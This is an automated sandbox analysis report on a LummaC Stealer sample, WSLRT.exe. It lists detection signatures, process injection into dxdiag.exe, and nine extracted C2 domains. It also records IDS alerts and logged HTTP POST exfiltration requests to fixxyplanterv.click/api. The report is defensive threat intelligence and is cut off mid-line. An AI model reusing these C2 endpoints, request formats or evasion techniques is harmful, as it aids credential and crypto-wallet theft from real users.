Edit tour

Windows Analysis Report
WSLRT.exe

Overview

General Information

Sample name:	WSLRT.exe
Analysis ID:	1589839
MD5:	7dadbf556492f9de788752000420c6f6
SHA1:	1ba1474fa22d88e4bd3300a3ad1abf2a6a422fa8
SHA256:	f5ce9b8329c08e9c5351319073a9fac32d2e6ea7ad7d510bf5a61c9d341de7f2
Tags:	exeghd78sgithubuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Creates a process in suspended mode (likely to inject code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

WSLRT.exe (PID: 6800 cmdline: "C:\Users\user\Desktop\WSLRT.exe" MD5: 7DADBF556492F9DE788752000420C6F6)

dxdiag.exe (PID: 2596 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["se-blurry.biz", "covery-mover.biz", "zinc-sneark.biz", "fixxyplanterv.click", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "print-vexer.biz", "impend-differ.biz"], "Build id": "ZqchOa--new"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000001.00000003.1924594667.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1902872299.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1925146540.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1924702653.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1905255414.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923050702.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923396438.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1878943431.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923653553.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923498896.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1924143105.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1879080551.0000000003458000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1904508771.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923232078.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1924823683.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922785286.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1892683034.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1903267214.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 2596	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 2596	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 2596	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 30 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:28.401455+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	172.67.134.197	443	TCP
2025-01-13T08:34:29.413014+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	172.67.134.197	443	TCP
2025-01-13T08:34:30.770894+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	172.67.134.197	443	TCP
2025-01-13T08:34:31.924788+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	172.67.134.197	443	TCP
2025-01-13T08:34:33.330422+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	172.67.134.197	443	TCP
2025-01-13T08:34:35.272248+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	172.67.134.197	443	TCP
2025-01-13T08:34:36.681814+0100	2028371	3	Unknown Traffic	192.168.2.4	49736	172.67.134.197	443	TCP
2025-01-13T08:34:38.800815+0100	2028371	3	Unknown Traffic	192.168.2.4	49737	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:28.885127+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	172.67.134.197	443	TCP
2025-01-13T08:34:29.889364+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49731	172.67.134.197	443	TCP
2025-01-13T08:34:39.244158+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49737	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:28.885127+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:29.889364+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49731	172.67.134.197	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:34:32.434366+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49733	172.67.134.197	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["se-blurry.biz", "covery-mover.biz", "zinc-sneark.biz", "fixxyplanterv.click", "formy-spill.biz", "dwell-exclaim.biz", "dare-curbys.biz", "print-vexer.biz", "impend-differ.biz"], "Build id": "ZqchOa--new"}

Multi AV Scanner detection for submitted file

Source: WSLRT.exe	Virustotal: Detection: 58%			Perma Link
Source: WSLRT.exe	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for sample

Source: WSLRT.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: fixxyplanterv.click
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1855537289.0000021567461000.00000004.00000020.00020000.00000000.sdmp	String decryptor: ZqchOa--new

Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: WSLRT.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 172.67.134.197:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: fixxyplanterv.click
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: impend-differ.biz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 172.67.134.197:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0JL8RU06MMF9EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18131Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XIT4MVOB7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8728Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=FRX9K6DEPQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20387Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CH7TYY8CL3UKHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=142Z09EQZZSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551118Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fixxyplanterv.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fixxyplanterv.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click

Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: dxdiag.exe, 00000001.00000003.1903490936.0000000005786000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: dxdiag.exe, 00000001.00000003.1905255414.0000000003443000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: dxdiag.exe, 00000001.00000003.1879375132.000000000578F000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1880103801.0000000005778000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: dxdiag.exe, 00000001.00000003.1935607021.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1925748358.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/
Source: dxdiag.exe, 00000001.00000003.1935790375.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1939532652.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1939670222.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000002.1972698531.0000000003470000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1945462618.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1961486214.000000000346F000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1935607021.000000000346A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/:
Source: dxdiag.exe, 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/C3
Source: dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1935607021.000000000346A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1923981712.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1903451242.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1935711006.0000000003456000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/api
Source: dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/api&3
Source: dxdiag.exe, 00000001.00000003.1891726210.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1891776601.0000000003458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/api?4
Source: dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiM
Source: dxdiag.exe, 00000001.00000002.1972096748.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1971023716.00000000033E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fixxyplanterv.click/apiP
Source: dxdiag.exe, 00000001.00000003.1922204202.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921681897.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921228817.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922641260.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921443405.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922521115.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1921325690.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922340035.0000000003450000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000001.00000003.1922026178.0000000003450000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 